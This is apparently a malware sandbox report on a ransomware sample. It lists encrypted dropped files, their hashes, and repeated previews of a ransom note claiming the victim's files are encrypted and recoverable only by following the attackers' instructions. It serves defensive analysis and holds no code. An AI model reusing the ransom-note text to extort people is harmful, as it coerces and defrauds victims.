Z...,.B.)B.g......
          C:\Users\Default\NTUSER.DAT{8ebe95f7-3dcb-11e8-a9d9-7cfe90913f50}.TM.blf
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):65768
          Entropy (8bit):7.997488810750565
          Encrypted:true
          SSDEEP:1536:+haveFRMDA5sd8G1EIP+IQnffP6I11CDjKiy0SmaJfTMHgf6Y7W0A8H:+CeSW8RP+16I0XyLmc+MbAW
          MD5:140C67C7D00B1212B48BBF89FE090654
          SHA1:425C48C20E3EB6A5DAC564608B67E3F65F13E02E
          SHA-256:5BD3E511C7443B8AC8CC788D5463E95DD16131B3B00666544E954AC9C2AF02AB
          SHA-512:46E5559BEC176F68A166374F2CFAD3D3AD2B142CEAAD9C73C37E78BF38459B215105FD1E4A914B86668C44C047BDA48112469129CAF384937B40A2D1CBFFF3A8
          Malicious:false
          Reputation:low
          Preview: .{.%.U.!.....4..O~=.d...8.........J....Y7.t.*cf."n.....pY.0-!6A".t-.}...;7.k....8|.G.Y.t7q.+...o>....> ....v|.D....O.i1..ep.....;..M........h.H......g..s..D.b..6O.^..!(XW..BF.....xj.}.....l..0.?.F.f-.|.j.XRv...FA..R.>...X......R..c...!...$^..pR....,[uk...W...|...^.i..Z....2..Up.....P..&..s}.zl.......%...y<.p.*!.iTW.....>...h...r]M..|..........&ZV..F.}..T\.:...#`........km..p.>...#....jE.....3._m.u........q.!.....Y.C.!D.D.0.......l..|];.~..|.R.k.!T$s....p.F...$.cm|....g......X...C..A9:....jJ.\.7.._E...b...k..mL.G.z.w..oHZL....iEGz.."..;/i..S...U..~(.u.....Y...B...m...GH....zH.....Dzi...8..J.........0_.1(....I.C.mfi.........c..0]..A....>SjIc.f.....y...{.....gr>.......`..V.!(..rO.......),.V.o8x..=kx.4......M.n...U.o......6......LN..Z.=.(...*!.z......S.0if...f..:.=M"-.D.K..?..='.z..0N.etl..a....F..gd.0.B...........R$.....D8X.....**.<ewm...t...Q. ...E....|<........L..2q"..).....@...O.-..d.~?..Z,....&I..I.0.")V...3.G....n.A..Z.N.
          C:\Users\Default\NTUSER.DAT{8ebe95f7-3dcb-11e8-a9d9-7cfe90913f50}.TMContainer00000000000000000001.regtrans-ms
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):524520
          Entropy (8bit):7.9996414441647055
          Encrypted:true
          SSDEEP:12288:OaK9Zq1wAAjS6IAkTwVy44J9Vk/08ObqzAHHNlGWwv5:Kw1wnjjkSeJ9i/0tbqkHHNgWwB
          MD5:7A35CD0AF3AB22B0D866F89843FAC8FF
          SHA1:33C9B852246034CDE75A57E89AABBEAEDFBFF193
          SHA-256:01214D0CA14625BD561F759C6BC8B27B25E1B07F55692CAB5AF1C14F44A141D4
          SHA-512:D5EBEBA8A0EC0823797B12994A37E7C6BA9908820DD99F60B0174A1E22946A396D8E8BF8314838DC3EFDEB0E21453186AB7BD814A5147795949F7AE1EC19307B
          Malicious:false
          Reputation:low
          Preview: ....J.I^e..U..)1r..^!-U..a............\.8P0...gp_>,$.Lul...y>.?...N$.......u. w.2p....i.w._.~o4`.<y.6Z.F94..~.i....y.O"... ^..b...fs.a??./....4.A.......2.V7.:...r...X.F....s.F].....0j8. ]..........<.......Z.Z.h.^p).......'..$r(.A..#z\..2.'.....R.V.g7.A.............Fz...4...')..k..S+..^........;..J.%.y....)......^.?q......._.A&...?4.I7W../...-.....z.l...r..f.}.........,.1&.p{~./7U..P.F.3..!..u...E..........x..........j.1Ro.f...F..6.^.A......:.Z!If6'(...C...#B.U!,....s.e.W8H9..].J...%..M........d...... z.).`.............*o.m.).I&.U.&....a..q.!L@.>@#.T.C`4|.>^,[....|.9.^hE.P.+....W.:..o8=..)...S.7..;{.J......bb.....v"....HpW.d.!...4o.....5.......!L2.......".....S...[0.A.z..+..L....V..xf...B.........L.!..9.....G....q......O..m..z.$b...GCr.....{.._..>...Q.U(..|.u.T .lK.....|R.uS...,.0%.B..<..b5.....k....,.H...../S....Si3......-00..b.6J.k......P.q.g.....=......CI......(.&m..;.>1t....-H.D`.C%....=[%.p>j..No..O!.f..c.A`...`..J.F.e.pQ.nb.t
          C:\Users\Default\NTUSER.DAT{8ebe95f7-3dcb-11e8-a9d9-7cfe90913f50}.TMContainer00000000000000000002.regtrans-ms
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):524520
          Entropy (8bit):7.999638362448107
          Encrypted:true
          SSDEEP:12288:x5ULCn3cOGhaejQNCrJ3VfNF+7Q5dd5VCDVfKgXyrYdvm8jzXmwt6W:x5U+d7NgJFP+k5b5qfVyrYdvmGzXmw0W
          MD5:3FC26A30052BCA80D7EBBDC2C68FF11C
          SHA1:3B5DE44E7D8BF8BA0222F666913D9E913FEDAEA4
          SHA-256:8BB6D3B8F214E8694D99D4CE9041AE49246F151BE4098E0D730F7D53EC1F12D2
          SHA-512:E41B10D360DC295FDF3F41E408512F09F52A2E1CDA4D3A292BF68010213CFB5DF225A5314B7F4A46B44643AB5483AD25EC89E52BA0962F2719E44B7B461484C6
          Malicious:false
          Reputation:low
          Preview: Y.;.l.%Y.6.AQ...<..+n.....e..U..C&...K....P..g.Pyn..%.0..Tu....P..c..d.""2...J.j..=.HN....{..K.xa(tf.=P6.9....&.......?^WW..)<p.....y..{Q]..v .5!~....ta....M.5:..e?U...d.....':.?.Q.6+....}..^.C..&.k..x..Gi+.9EHZRCdT.8.....\.U...W/.....J.W[..u7..o.....e......aJ..\.q....V....I&..<.@..?.1j..]....c.rgT9w%".....Gs......=|G..M.ml..o].=_C.LJ.h...].y. ....'..T......gx,....w..N.r7...W.....9....+.g..2......R..j...r.d.8....|h[.h.{.D...UE`..._..n...j.qj>.....B.QFu@s.6..{;.....C.7i.........c.z.'.'...2Z.c=)8.-:..=i......o....g.L.u Pw.."R......w.T... .J.iR.Z.Y.o.d.............{P......../..{=....../bF)VSa3....Zu,.3..}...:.UC....\`K....?..=.L..............:VJ..E.....5.\.......R.P..,.. Q.f;...d..k.5....v...%.R.......(..Qp...O.Wvd.....Y.rb.w..uyJ.ks.....V=."j...=.....eH...c...1....xj.%........@\....2.aeS.....A`.BAcS>...c....E...K.~.,V.sid:....<.\...sQ..>..F.4Q._...@...... .%Y.$`.Q.A]...sz..CO'..8D).6;E.....GV.Wc=...z.i....-.....W%.....'XU)t..A......wl\
          C:\Users\Default\Pictures\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Reputation:low
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\Default\Saved Games\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Reputation:low
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\Default\Videos\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\Default\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\Public\AccountPictures\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\Public\Desktop\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\Public\Documents\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\Public\Downloads\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\Public\Libraries\RecordedTV.library-ms
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1231
          Entropy (8bit):7.873250538556591
          Encrypted:false
          SSDEEP:24:T4L07UNggZdgkZGjqcFbJZk7LD1bfNk9Hv52cyKx5q9qs8QQCvREXADn+zRH:TBKdgMMqSWfNk9h+Kx09rpQCvuu+lH
          MD5:96ED0430ABF8E6751122961B0401B64B
          SHA1:DE9F5A5FE2A1972A1D51E517E8614FA85196EBA6
          SHA-256:4A75F7DF381486FF662C1B342E5E769729D103BC65EAF1E003261504C744DCCF
          SHA-512:CA964E5F77A6B776A9361FB61FD6540D0B8D417E7A4F805FEF5A5DA08EAFA1CDD8B9BE25A9E27F8E82A2AE4F8D53289D6F23D5E33A186B6A603A9599C7C51B1A
          Malicious:false
          Preview: ..[.?..Z..a.......j.KB[+...+..:f.J.5...MV...{...z..FMP`.R.Z<.T....'i...Q,..A..=(..@l..{5.NT.`.)).h...).u..$...$T.@...}b....:.Bc....,.>.B.E$...*.J........r..7`...(...P,>.X.+...w~5uY~.....o4_.....j......j...aC....dq.q../.QU.}...W....`.48+<.l...c.[...V.2.Z.c.o.E....j.dA.4,.&Sd*P.4y.. ...x.s.._...u...<P({..3.a.Qw[%.NB0.pC..}[.7.^9N%U.z....H....y.uo.W.$.E.p.a....H...w>.n_.t=~........B..%... ......j.}..Gf...._.A........U..<.9+......!h]..I...e...*..Jq!..l.B.v.O..O....(~Z@.#.L..!....U'...Zr.N.4nM..y"..&...s:M.GiN.<........`R......K.o..Y.....Z.8...A....1..2......%b..h.]..1o......W..K.p.r.1....t..x.....c.l.F.=.mp..5,".c>+..j9..~..!&..qhv.A.8.t..3.\...O. .&.E...D.eC..;.E...W9........p.....<.a......4.pV.}...g.&....\......*....].........q.....A^...1C...F.*....<~....L....<..=c....(]....{|. .KM.r....YL3/...;..B...Y=]n.S0...I.....R|....9&".........m..&78....+`.6.c.....:/}Z=.T....D...g.U....?s...R..8.z.L.5.Y...C#S.p.d..lN.i...I.>h.U./"..$......P.
          C:\Users\Public\Libraries\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
